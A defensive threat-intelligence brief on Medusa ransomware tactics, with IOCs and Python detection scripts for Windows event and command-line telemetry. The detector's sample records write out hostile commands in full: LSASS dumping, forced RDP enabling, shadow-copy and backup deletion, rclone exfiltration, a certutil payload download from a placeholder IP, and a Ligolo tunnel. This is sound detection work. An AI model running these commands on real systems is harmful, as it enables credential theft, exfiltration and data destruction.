Severity: critical | June 30, 2026

Medusa Ransomware - RaaS Double Extortion Against Critical Sectors


Medusa is a ransomware-as-a-service operation tracked since June 2021 and designated Storm-1175 by Microsoft, distinct from the unrelated MedusaLocker family and the Medusa Android banking trojan. A March 2025 joint advisory from CISA, the FBI, and MS-ISAC documented more than 300 victims, and reporting through 2026 describes continued high-tempo affiliate activity. The operation is notable for a broad sector footprint spanning healthcare, education, legal, insurance, technology, and manufacturing, a mature double extortion model in which stolen data is published on a Tor leak site with a countdown timer, and at least one documented case of triple extortion where a second actor re-extorted a victim after a negotiated payment.

Initial access is brokered or earned: affiliates buy footholds from initial access brokers, run credential phishing, and exploit internet-facing software, with ConnectWise ScreenConnect and Fortinet EMS among the documented targets. Once inside, operators harvest credentials from LSASS memory with Mimikatz-class tooling and reuse them through pass-the-hash and pass-the-ticket, then enumerate the domain with built-in utilities and network scanners to locate domain controllers, shares, and high-value hosts. Persistence and privilege come from creating new domain accounts and adding them to Domain Admins and Enterprise Admins, while RMM platforms such as AnyDesk, Atera, ConnectWise, and Splashtop are silently installed for durable remote control that blends into administrative traffic. Because these RMM tools are legitimate, detecting their installation depends on knowing which one your organization sanctions and alerting on any other.
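The account-staging step above (create a domain account, then promote it into Domain Admins or Enterprise Admins) is visible in Windows Security events 4720 and 4728/4756. The following Python is an added example, not code from this brief or the source report: it correlates a creation event with a later privileged-group addition and rates that pair more severely than the promotion of a long-standing account. The events are constructed to resemble forwarded Security-log records; the host names, SIDs and the one-hour staging window are assumptions.

```python
"""Correlate new-account creation with privileged-group additions.

Added example for this brief; the Security-log records below are constructed
(not real telemetry) and mirror the fields of Event IDs 4720, 4728, 4732 and 4756.
"""
from datetime import datetime, timedelta

# Well-known RIDs of privileged domain groups, read from the group's SID
# (S-1-5-21-<domain>-<rid>). BUILTIN\Administrators has a fixed SID instead.
PRIVILEGED_RIDS = {512: "Domain Admins", 519: "Enterprise Admins",
                   518: "Schema Admins", 516: "Domain Controllers"}
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"

ACCOUNT_CREATED = 4720
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to global / local / universal group
STAGING_WINDOW = timedelta(hours=1)     # assumption: promotion this soon after creation is staging


def privileged_group_name(sid):
    """Return the well-known name if `sid` is a privileged group, else None."""
    if sid == BUILTIN_ADMINISTRATORS:
        return "Administrators"
    if not sid.startswith("S-1-5-21-"):
        return None
    try:
        return PRIVILEGED_RIDS.get(int(sid.rsplit("-", 1)[1]))
    except ValueError:
        return None


def find_privileged_additions(events):
    """Return one finding per addition to a privileged group; a member created
    within STAGING_WINDOW beforehand is marked new_account and rated critical."""
    created = {}    # member SID -> creation time
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["EventID"] == ACCOUNT_CREATED:
            created[ev["TargetSid"]] = ts
            continue
        if ev["EventID"] not in GROUP_ADD_EVENTS:
            continue
        group = privileged_group_name(ev["TargetSid"])   # in 4728/4732/4756 the group is the "target"
        if group is None:
            continue
        born = created.get(ev["MemberSid"])
        staged = born is not None and ts - born <= STAGING_WINDOW
        findings.append({
            "time": ev["time"], "host": ev["Computer"], "event_id": ev["EventID"],
            "actor": ev["SubjectUserName"], "member": ev["MemberName"],
            "member_sid": ev["MemberSid"], "group": group,
            "new_account": staged, "severity": "critical" if staged else "high",
        })
    return findings


DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed domain SID
# Constructed sample events; ISO timestamps keep the sort stable.
SAMPLE_EVENTS = [
    {"time": "2026-06-30T09:58:00", "EventID": 4624, "Computer": "DC01"},
    {"time": "2026-06-30T10:00:00", "EventID": 4720, "Computer": "DC01",
     "SubjectUserName": "jdoe", "TargetUserName": "svc_backup2", "TargetSid": DOMAIN + "-1105"},
    {"time": "2026-06-30T10:04:00", "EventID": 4728, "Computer": "DC01",
     "SubjectUserName": "jdoe", "TargetSid": DOMAIN + "-512",
     "MemberName": "CN=svc_backup2,CN=Users,DC=corp,DC=example", "MemberSid": DOMAIN + "-1105"},
    {"time": "2026-06-30T10:05:00", "EventID": 4756, "Computer": "DC01",
     "SubjectUserName": "jdoe", "TargetSid": DOMAIN + "-519",
     "MemberName": "CN=svc_backup2,CN=Users,DC=corp,DC=example", "MemberSid": DOMAIN + "-1105"},
    {"time": "2026-06-30T10:06:00", "EventID": 4728, "Computer": "DC01",   # ordinary group: ignored
     "SubjectUserName": "jdoe", "TargetSid": DOMAIN + "-1150",
     "MemberName": "CN=mlee,CN=Users,DC=corp,DC=example", "MemberSid": DOMAIN + "-1010"},
    {"time": "2026-06-30T10:20:00", "EventID": 4732, "Computer": "FS01",   # local Administrators
     "SubjectUserName": "jdoe", "TargetSid": BUILTIN_ADMINISTRATORS,
     "MemberName": "-", "MemberSid": DOMAIN + "-1105"},
    {"time": "2026-06-30T14:30:00", "EventID": 4728, "Computer": "DC01",   # old account promoted
     "SubjectUserName": "admin.ops", "TargetSid": DOMAIN + "-512",
     "MemberName": "CN=asmith,CN=Users,DC=corp,DC=example", "MemberSid": DOMAIN + "-1001"},
]

if __name__ == "__main__":
    for f in find_privileged_additions(SAMPLE_EVENTS):
        print(f"{f['time']} {f['severity']:8} {f['host']}: {f['actor']} added "
              f"{f['member']} to {f['group']} (new account: {f['new_account']})")
```

Matching on the group SID rather than its display name survives renamed or localized groups, and the 4732 case shows why local Administrators additions on file servers belong in the same view as domain-level promotions.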

Before encryption the operators invest heavily in defense evasion and staging. A malicious, code-signed kernel driver, ABYSSWORKER, is loaded to terminate endpoint protection from ring zero; PowerShell command history is wiped; and payloads are obscured with base64 encoding and string-concatenation tricks. Lateral movement runs over RDP, which is force-enabled through registry and firewall changes, as well as PsExec, WMI-based remote execution, and software deployment tooling for fan-out. Operators tunnel traffic with Ligolo and Cloudflared, open TLS reverse shells over port 443, and exfiltrate to attacker infrastructure with Rclone. Impact is delivered by deleting volume shadow copies and backup files, stopping backup, security, and database services, shutting down virtual machines, and encrypting file contents with AES-256, dropping a ransom note (!!!READ_ME_MEDUSA!!!.txt in the indicators below) in each affected directory.
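The credential dumping in the previous paragraph and the evasion, lateral-movement, exfiltration and impact commands in this one all leave process-creation records (Sysmon Event ID 1 or Security 4688) whose command lines can be matched directly. The Python below is an added example written for this page, not detection content from the brief, its vendor, or the source report; several rule names deliberately mirror the detections list further down. It goes one step beyond a plain keyword match by decoding PowerShell -EncodedCommand blobs and re-running the rules on the plaintext, so the base64 trick the text mentions does not hide the PSReadLine history wipe. The records, host names, the TEST-NET address 203.0.113.10 and the Ligolo-ng agent syntax used as a heuristic are constructed or assumed.

```python
"""Command-line detections for the Medusa post-exploitation chain.

Added example for this brief. The regexes are the editor's, not a vendor's
content, and the Sysmon Event ID 1 style records are constructed;
203.0.113.10 is a TEST-NET-3 address.
"""
import base64
import re

# (rule name, ATT&CK technique, patterns that must ALL match the command line)
RULES = [
    ("Execution of Known Credential Dumping Tools", "T1003.001",
     [r"procdump(?:64)?(?:\.exe)?\s.*-ma\s.*lsass|comsvcs\.dll[,\s]+#?\d*\s*MiniDump|sekurlsa::|mimikatz"]),
    ("RDP Force-Enabled via Registry", "T1021.001",
     [r"\breg(?:\.exe)?\s+add\b", r"fDenyTSConnections", r"/d\s+0\b"]),
    ("RDP Allowed Through Host Firewall", "T1562.004",
     [r"netsh(?:\.exe)?\s+advfirewall\s+firewall\s+set\s+rule", r"remote\s+desktop", r"enable=yes"]),
    ("PowerShell Command History Wipe Via PSReadLine HistorySavePath", "T1070.003",
     [r"Remove-Item|Clear-Content|\b(?:del|rm|ri|erase)\b", r"PSReadline", r"HistorySavePath"]),
    ("Volume Shadow Copy and Recovery Deletion", "T1490",
     [r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete"
      r"|wbadmin(?:\.exe)?\s+delete\s+catalog|bcdedit(?:\.exe)?.*recoveryenabled\s+no"]),
    ("Mass Deletion of Backup and Virtual Disk Files via Command Shell", "T1485",
     [r"\b(?:del|erase)\s+(?:/[sqf]\s+)*\S*\*\.(?:bak|vhdx?|vbk|vmdk)\b"]),
    ("Rclone Exfiltration to Remote Storage", "T1567.002",
     [r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b"]),
    ("certutil Used to Download Remote Payloads", "T1105",
     [r"\bcertutil(?:\.exe)?\s", r"-urlcache", r"https?://"]),
    ("PsExec Execution", "T1569.002",
     [r"\bpsexec(?:64)?(?:\.exe)?\s", r"\\\\\S+"]),
    # Assumption: ligolo-ng agent invocation style (-connect host:port -ignore-cert);
    # a heuristic of the editor's, not an indicator from the report.
    ("Ligolo Reverse Tunneling Agent Activity", "T1572",
     [r"-connect\s+\S+:\d+", r"-ignore-cert"]),
]
COMPILED = [(name, tid, [re.compile(p, re.I) for p in pats]) for name, tid, pats in RULES]

# powershell/pwsh ... -e | -ec | -enc | -encodedcommand <base64 of a UTF-16LE script>
ENCODED_RE = re.compile(
    r"(?:powershell|pwsh)(?:\.exe)?.*?\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand blob (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(records):
    """Apply every rule to each record's command line and, for encoded PowerShell,
    to the decoded payload as well. At most one hit per (record, rule)."""
    hits = []
    for rec in records:
        cmd = rec["CommandLine"]
        decoded = decode_encoded_command(cmd)
        for name, tid, pats in COMPILED:
            for text, via in ((cmd, "command line"), (decoded, "decoded -EncodedCommand")):
                if text is not None and all(p.search(text) for p in pats):
                    hits.append({"host": rec["Computer"], "pid": rec["ProcessId"], "rule": name,
                                 "technique": tid, "via": via, "evidence": text})
                    break
    return hits


# Constructed sample records; the history wipe is hidden behind -enc the way the text describes.
HISTORY_WIPE = "Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
ENCODED_WIPE = base64.b64encode(HISTORY_WIPE.encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    {"Computer": "WS07", "ProcessId": 4120, "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"Computer": "WS07", "ProcessId": 5022, "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\Temp\l.dmp"},
    {"Computer": "WS07", "ProcessId": 5090, "CommandLine":
     r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"Computer": "WS07", "ProcessId": 5091, "CommandLine":
     r'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"Computer": "WS07", "ProcessId": 5130, "CommandLine": "powershell.exe -NoP -W Hidden -enc " + ENCODED_WIPE},
    {"Computer": "FS01", "ProcessId": 2210, "CommandLine": r"vssadmin.exe delete shadows /all /quiet"},
    {"Computer": "FS01", "ProcessId": 2215, "CommandLine": r"cmd.exe /c del /s /q /f C:\Backups\*.bak C:\Backups\*.vhdx"},
    {"Computer": "FS01", "ProcessId": 2300, "CommandLine": r"rclone.exe copy C:\Shares\Finance remote:exfil --transfers 16"},
    {"Computer": "WS07", "ProcessId": 5400, "CommandLine":
     r"certutil.exe -urlcache -split -f http://203.0.113.10/gaze.exe C:\Users\Public\gaze.exe"},
    {"Computer": "WS07", "ProcessId": 5410, "CommandLine": r"psexec64.exe \\FS01 -accepteula -s cmd.exe /c whoami"},
    {"Computer": "WS07", "ProcessId": 5500, "CommandLine": r"C:\Users\Public\agent.exe -connect 203.0.113.10:11601 -ignore-cert"},
]

if __name__ == "__main__":
    for h in scan(SAMPLE_RECORDS):
        print(f"{h['host']} pid {h['pid']:5} {h['technique']:9} {h['rule']} [{h['via']}]")
```

Every pattern in a rule must match, which keeps `reg add` alone from firing and makes the RDP rule require both the fDenyTSConnections value and the zero; in production the same shape extends naturally to parent-process and signer fields that Sysmon also records.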

Indicators of compromise

SHA256 file hashes (2)
  • 56b08aa03bd8c0ea094cfeb03d5954ffd857bac42df929dc835eea62f32b09e0
  • baa980ae253101066ae7e551a354116454e8697ff2154a907c9885770cdae4ae

Email addresses (2)

File names (5)
  • gaze.exe
  • smuol.sys
  • openrdp.bat
  • powerfun.ps1
  • !!!READ_ME_MEDUSA!!!.txt

Detections (10)


  • Identification of Mimikatz Execution & Artifacts
  • PSExec Execution
  • User Added to Domain Administrators Groups
  • Execution of Known Credential Dumping Tools
  • Internal Host Port Scanning Another Internal Host
  • PowerShell Command History Wipe Via PSReadLine HistorySavePath
  • Mass Deletion of Backup and Virtual Disk Files via Command Shell
  • Ligolo Reverse Tunneling Agent Activity
  • certutil Used to Download Remote Payloads